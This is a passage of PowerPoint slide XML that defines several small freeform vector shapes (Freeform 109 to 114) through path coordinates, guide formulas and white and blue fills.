              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10702" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1302" y="2655"/>
                <a:ext cx="7" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 5 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 7"/>
                  <a:gd name="T4" fmla="*/ 6 w 7"/>
                  <a:gd name="T5" fmla="*/ 6 h 7"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 5 h 7"/>
                  <a:gd name="T8" fmla="*/ 7 w 7"/>
                  <a:gd name="T9" fmla="*/ 4 h 7"/>
                  <a:gd name="T10" fmla="*/ 6 w 7"/>
                  <a:gd name="T11" fmla="*/ 1 h 7"/>
                  <a:gd name="T12" fmla="*/ 6 w 7"/>
                  <a:gd name="T13" fmla="*/ 1 h 7"/>
                  <a:gd name="T14" fmla="*/ 5 w 7"/>
                  <a:gd name="T15" fmla="*/ 0 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 7"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 2 w 7"/>
                  <a:gd name="T19" fmla="*/ 0 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 7"/>
                  <a:gd name="T21" fmla="*/ 1 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 7"/>
                  <a:gd name="T23" fmla="*/ 1 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 7"/>
                  <a:gd name="T25" fmla="*/ 4 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 7"/>
                  <a:gd name="T27" fmla="*/ 5 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 7"/>
                  <a:gd name="T29" fmla="*/ 6 h 7"/>
                  <a:gd name="T30" fmla="*/ 2 w 7"/>
                  <a:gd name="T31" fmla="*/ 6 h 7"/>
                  <a:gd name="T32" fmla="*/ 3 w 7"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                    <a:moveTo>
                      <a:pt x="3" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10703" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1314" y="2655"/>
                <a:ext cx="5" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 5"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 4 w 5"/>
                  <a:gd name="T3" fmla="*/ 7 h 7"/>
                  <a:gd name="T4" fmla="*/ 5 w 5"/>
                  <a:gd name="T5" fmla="*/ 6 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 5"/>
                  <a:gd name="T7" fmla="*/ 5 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 5"/>
                  <a:gd name="T9" fmla="*/ 4 h 7"/>
                  <a:gd name="T10" fmla="*/ 5 w 5"/>
                  <a:gd name="T11" fmla="*/ 2 h 7"/>
                  <a:gd name="T12" fmla="*/ 5 w 5"/>
                  <a:gd name="T13" fmla="*/ 1 h 7"/>
                  <a:gd name="T14" fmla="*/ 4 w 5"/>
                  <a:gd name="T15" fmla="*/ 0 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 5"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 2 w 5"/>
                  <a:gd name="T19" fmla="*/ 0 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 5"/>
                  <a:gd name="T21" fmla="*/ 1 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 5"/>
                  <a:gd name="T23" fmla="*/ 2 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 5"/>
                  <a:gd name="T25" fmla="*/ 4 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 5"/>
                  <a:gd name="T27" fmla="*/ 5 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 5"/>
                  <a:gd name="T29" fmla="*/ 6 h 7"/>
                  <a:gd name="T30" fmla="*/ 2 w 5"/>
                  <a:gd name="T31" fmla="*/ 7 h 7"/>
                  <a:gd name="T32" fmla="*/ 3 w 5"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 5 w 5"/>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7">
                    <a:moveTo>
                      <a:pt x="3" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10704" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1268" y="2563"/>
                <a:ext cx="19" cy="92"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 19"/>
                  <a:gd name="T1" fmla="*/ 1 h 92"/>
                  <a:gd name="T2" fmla="*/ 6 w 19"/>
                  <a:gd name="T3" fmla="*/ 3 h 92"/>
                  <a:gd name="T4" fmla="*/ 4 w 19"/>
                  <a:gd name="T5" fmla="*/ 8 h 92"/>
                  <a:gd name="T6" fmla="*/ 2 w 19"/>
                  <a:gd name="T7" fmla="*/ 16 h 92"/>
                  <a:gd name="T8" fmla="*/ 1 w 19"/>
                  <a:gd name="T9" fmla="*/ 28 h 92"/>
                  <a:gd name="T10" fmla="*/ 0 w 19"/>
                  <a:gd name="T11" fmla="*/ 41 h 92"/>
                  <a:gd name="T12" fmla="*/ 0 w 19"/>
                  <a:gd name="T13" fmla="*/ 56 h 92"/>
                  <a:gd name="T14" fmla="*/ 1 w 19"/>
                  <a:gd name="T15" fmla="*/ 73 h 92"/>
                  <a:gd name="T16" fmla="*/ 5 w 19"/>
                  <a:gd name="T17" fmla="*/ 92 h 92"/>
                  <a:gd name="T18" fmla="*/ 19 w 19"/>
                  <a:gd name="T19" fmla="*/ 91 h 92"/>
                  <a:gd name="T20" fmla="*/ 18 w 19"/>
                  <a:gd name="T21" fmla="*/ 89 h 92"/>
                  <a:gd name="T22" fmla="*/ 16 w 19"/>
                  <a:gd name="T23" fmla="*/ 80 h 92"/>
                  <a:gd name="T24" fmla="*/ 15 w 19"/>
                  <a:gd name="T25" fmla="*/ 70 h 92"/>
                  <a:gd name="T26" fmla="*/ 14 w 19"/>
                  <a:gd name="T27" fmla="*/ 56 h 92"/>
                  <a:gd name="T28" fmla="*/ 13 w 19"/>
                  <a:gd name="T29" fmla="*/ 42 h 92"/>
                  <a:gd name="T30" fmla="*/ 13 w 19"/>
                  <a:gd name="T31" fmla="*/ 27 h 92"/>
                  <a:gd name="T32" fmla="*/ 15 w 19"/>
                  <a:gd name="T33" fmla="*/ 13 h 92"/>
                  <a:gd name="T34" fmla="*/ 19 w 19"/>
                  <a:gd name="T35" fmla="*/ 1 h 92"/>
                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37" fmla="*/ 0 h 92"/>
                  <a:gd name="T38" fmla="*/ 19 w 19"/>
                  <a:gd name="T39" fmla="*/ 0 h 92"/>
                  <a:gd name="T40" fmla="*/ 19 w 19"/>
                  <a:gd name="T41" fmla="*/ 0 h 92"/>
                  <a:gd name="T42" fmla="*/ 18 w 19"/>
                  <a:gd name="T43" fmla="*/ 0 h 92"/>
                  <a:gd name="T44" fmla="*/ 16 w 19"/>
                  <a:gd name="T45" fmla="*/ 0 h 92"/>
                  <a:gd name="T46" fmla="*/ 14 w 19"/>
                  <a:gd name="T47" fmla="*/ 0 h 92"/>
                  <a:gd name="T48" fmla="*/ 11 w 19"/>
                  <a:gd name="T49" fmla="*/ 0 h 92"/>
                  <a:gd name="T50" fmla="*/ 6 w 19"/>
                  <a:gd name="T51" fmla="*/ 1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
                  <a:gd name="T79" fmla="*/ 0 h 92"/>
                  <a:gd name="T80" fmla="*/ 19 w 19"/>
                  <a:gd name="T81" fmla="*/ 92 h 9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 h="92">
                    <a:moveTo>
                      <a:pt x="6" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10705" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1366" y="2551"/>
                <a:ext cx="27" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 0 h 103"/>
                  <a:gd name="T2" fmla="*/ 26 w 27"/>
                  <a:gd name="T3" fmla="*/ 1 h 103"/>
                  <a:gd name="T4" fmla="*/ 25 w 27"/>
                  <a:gd name="T5" fmla="*/ 4 h 103"/>
                  <a:gd name="T6" fmla="*/ 22 w 27"/>
                  <a:gd name="T7" fmla="*/ 9 h 103"/>
                  <a:gd name="T8" fmla="*/ 20 w 27"/>
                  <a:gd name="T9" fmla="*/ 18 h 103"/>
                  <a:gd name="T10" fmla="*/ 18 w 27"/>
                  <a:gd name="T11" fmla="*/ 32 h 103"/>
                  <a:gd name="T12" fmla="*/ 16 w 27"/>
                  <a:gd name="T13" fmla="*/ 49 h 103"/>
                  <a:gd name="T14" fmla="*/ 18 w 27"/>
                  <a:gd name="T15" fmla="*/ 73 h 103"/>
                  <a:gd name="T16" fmla="*/ 20 w 27"/>
                  <a:gd name="T17" fmla="*/ 103 h 103"/>
                  <a:gd name="T18" fmla="*/ 5 w 27"/>
                  <a:gd name="T19" fmla="*/ 103 h 103"/>
                  <a:gd name="T20" fmla="*/ 5 w 27"/>
                  <a:gd name="T21" fmla="*/ 101 h 103"/>
                  <a:gd name="T22" fmla="*/ 4 w 27"/>
                  <a:gd name="T23" fmla="*/ 91 h 103"/>
                  <a:gd name="T24" fmla="*/ 2 w 27"/>
                  <a:gd name="T25" fmla="*/ 80 h 103"/>
                  <a:gd name="T26" fmla="*/ 1 w 27"/>
                  <a:gd name="T27" fmla="*/ 64 h 103"/>
                  <a:gd name="T28" fmla="*/ 0 w 27"/>
                  <a:gd name="T29" fmla="*/ 47 h 103"/>
                  <a:gd name="T30" fmla="*/ 1 w 27"/>
                  <a:gd name="T31" fmla="*/ 31 h 103"/>
                  <a:gd name="T32" fmla="*/ 4 w 27"/>
                  <a:gd name="T33" fmla="*/ 14 h 103"/>
                  <a:gd name="T34" fmla="*/ 9 w 27"/>
                  <a:gd name="T35" fmla="*/ 0 h 103"/>
                  <a:gd name="T36" fmla="*/ 27 w 27"/>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103"/>
                  <a:gd name="T59" fmla="*/ 27 w 27"/>
                  <a:gd name="T60" fmla="*/ 103 h 10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103">
                    <a:moveTo>
                      <a:pt x="27" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10706" name="Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1268" y="2568"/>
                <a:ext cx="18" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 18"/>
                  <a:gd name="T1" fmla="*/ 2 h 80"/>
                  <a:gd name="T2" fmla="*/ 6 w 18"/>
                  <a:gd name="T3" fmla="*/ 3 h 80"/>
                  <a:gd name="T4" fmla="*/ 5 w 18"/>
                  <a:gd name="T5" fmla="*/ 8 h 80"/>
                  <a:gd name="T6" fmla="*/ 2 w 18"/>
                  <a:gd name="T7" fmla="*/ 15 h 80"/>
                  <a:gd name="T8" fmla="*/ 1 w 18"/>
                  <a:gd name="T9" fmla="*/ 24 h 80"/>
                  <a:gd name="T10" fmla="*/ 0 w 18"/>
                  <a:gd name="T11" fmla="*/ 36 h 80"/>
                  <a:gd name="T12" fmla="*/ 1 w 18"/>
                  <a:gd name="T13" fmla="*/ 50 h 80"/>
                  <a:gd name="T14" fmla="*/ 2 w 18"/>
                  <a:gd name="T15" fmla="*/ 65 h 80"/>
                  <a:gd name="T16" fmla="*/ 5 w 18"/>
                  <a:gd name="T17" fmla="*/ 80 h 80"/>
                  <a:gd name="T18" fmla="*/ 16 w 18"/>
                  <a:gd name="T19" fmla="*/ 80 h 80"/>
                  <a:gd name="T20" fmla="*/ 16 w 18"/>
                  <a:gd name="T21" fmla="*/ 78 h 80"/>
                  <a:gd name="T22" fmla="*/ 15 w 18"/>
                  <a:gd name="T23" fmla="*/ 71 h 80"/>
                  <a:gd name="T24" fmla="*/ 14 w 18"/>
                  <a:gd name="T25" fmla="*/ 61 h 80"/>
                  <a:gd name="T26" fmla="*/ 13 w 18"/>
                  <a:gd name="T27" fmla="*/ 50 h 80"/>
                  <a:gd name="T28" fmla="*/ 12 w 18"/>
                  <a:gd name="T29" fmla="*/ 37 h 80"/>
                  <a:gd name="T30" fmla="*/ 12 w 18"/>
                  <a:gd name="T31" fmla="*/ 24 h 80"/>
                  <a:gd name="T32" fmla="*/ 14 w 18"/>
                  <a:gd name="T33" fmla="*/ 11 h 80"/>
                  <a:gd name="T34" fmla="*/ 18 w 18"/>
                  <a:gd name="T35" fmla="*/ 1 h 80"/>
                  <a:gd name="T36" fmla="*/ 18 w 18"/>
                  <a:gd name="T37" fmla="*/ 1 h 80"/>
                  <a:gd name="T38" fmla="*/ 18 w 18"/>
                  <a:gd name="T39" fmla="*/ 1 h 80"/>
                  <a:gd name="T40" fmla="*/ 18 w 18"/>
                  <a:gd name="T41" fmla="*/ 1 h 80"/>
                  <a:gd name="T42" fmla="*/ 16 w 18"/>
                  <a:gd name="T43" fmla="*/ 0 h 80"/>
                  <a:gd name="T44" fmla="*/ 15 w 18"/>
                  <a:gd name="T45" fmla="*/ 0 h 80"/>
                  <a:gd name="T46" fmla="*/ 13 w 18"/>
                  <a:gd name="T47" fmla="*/ 0 h 80"/>
                  <a:gd name="T48" fmla="*/ 9 w 18"/>
                  <a:gd name="T49" fmla="*/ 1 h 80"/>
                  <a:gd name="T50" fmla="*/ 6 w 18"/>
                  <a:gd name="T51" fmla="*/ 2 h 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
                  <a:gd name="T79" fmla="*/ 0 h 80"/>
                  <a:gd name="T80" fmla="*/ 18 w 18"/>
                  <a:gd name="T81" fmla="*/ 80 h 8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 h="80">
                    <a:moveTo>
                      <a:pt x="6" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10707" name="Freeform 114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1269" y="2573"/>
                <a:ext cx="14" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 14"/>
                  <a:gd name="T1" fmla="*/ 2 h 69"/>
                  <a:gd name="T2" fmla="*/ 5 w 14"/>
                  <a:gd name="T3" fmla="*/ 3 h 69"/>
                  <a:gd name="T4" fmla="*/ 4 w 14"/>
                  <a:gd name="T5" fmla="*/ 7 h 69"/>
                  <a:gd name="T6" fmla="*/ 3 w 14"/>
                  <a:gd name="T7" fmla="*/ 13 h 69"/>
                  <a:gd name="T8" fmla="*/ 1 w 14"/>
                  <a:gd name="T9" fmla="*/ 21 h 69"/>
                  <a:gd name="T10" fmla="*/ 0 w 14"/>
                  <a:gd name="T11" fmla="*/ 31 h 69"/>
                  <a:gd name="T12" fmla="*/ 0 w 14"/>
                  <a:gd name="T13" fmla="*/ 42 h 69"/>
                  <a:gd name="T14" fmla="*/ 1 w 14"/>
                  <a:gd name="T15" fmla="*/ 55 h 69"/>
                  <a:gd name="T16" fmla="*/ 4 w 14"/>
                  <a:gd name="T17" fmla="*/ 69 h 69"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 68 h 69"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 67 h 69"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 61 h 69"/>
                  <a:gd name="T24" fmla="*/ 12 w 14"/>
                  <a:gd name="T25" fmla="*/ 53 h 69"/>
                  <a:gd name="T26" fmla="*/ 11 w 14"/>
                  <a:gd name="T27" fmla="*/ 42 h 69"/>
                  <a:gd name="T28" fmla="*/ 10 w 14"/>
                  <a:gd name="T29" fmla="*/ 32 h 69"/>
                  <a:gd name="T30" fmla="*/ 10 w 14"/>
                  <a:gd name="T31" fmla="*/ 20 h 69"/>
                  <a:gd name="T32" fmla="*/ 12 w 14"/>
                  <a:gd name="T33" fmla="*/ 10 h 69"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 2 h 69"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 2 h 69"/>
                  <a:gd name="T38" fmla="*/ 14 w 14"/>
                  <a:gd name="T39" fmla="*/ 0 h 69"/>
                  <a:gd name="T40" fmla="*/ 14 w 14"/>
                  <a:gd name="T41" fmla="*/ 0 h 69"/>
                  <a:gd name="T42" fmla="*/ 14 w 14"/>
                  <a:gd name="T43" fmla="*/ 0 h 69"/>
                  <a:gd name="T44" fmla="*/ 13 w 14"/>
                  <a:gd name="T45" fmla="*/ 0 h 69"/>
                  <a:gd name="T46" fmla="*/ 11 w 14"/>
                  <a:gd name="T47" fmla="*/ 0 h 69"/>
                  <a:gd name="T48" fmla="*/ 8 w 14"/>
                  <a:gd name="T49" fmla="*/ 0 h 69"/>
                  <a:gd name="T50" fmla="*/ 5 w 14"/>
                  <a:gd name="T51" fmla="*/ 2 h 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
                  <a:gd name="T79" fmla="*/ 0 h 69"/>
                  <a:gd name="T80" fmla="*/ 14 w 14"/>
                  <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                    <a:moveTo>
                      <a:pt x="5" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
